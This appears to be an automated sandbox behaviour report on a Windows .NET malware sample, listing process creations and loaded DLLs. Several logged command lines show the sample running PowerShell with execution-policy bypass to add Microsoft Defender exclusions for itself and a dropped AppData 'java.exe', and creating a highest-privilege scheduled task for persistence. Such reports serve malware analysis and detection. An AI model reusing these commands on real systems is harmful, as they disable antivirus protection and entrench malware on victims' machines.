                      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: file.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\java.exe C:\Users\user\AppData\Roaming\java.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\java.exe "C:\Users\user\AppData\Roaming\java.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\java.exe "C:\Users\user\AppData\Roaming\java.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\java.exe C:\Users\user\AppData\Roaming\java.exe
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
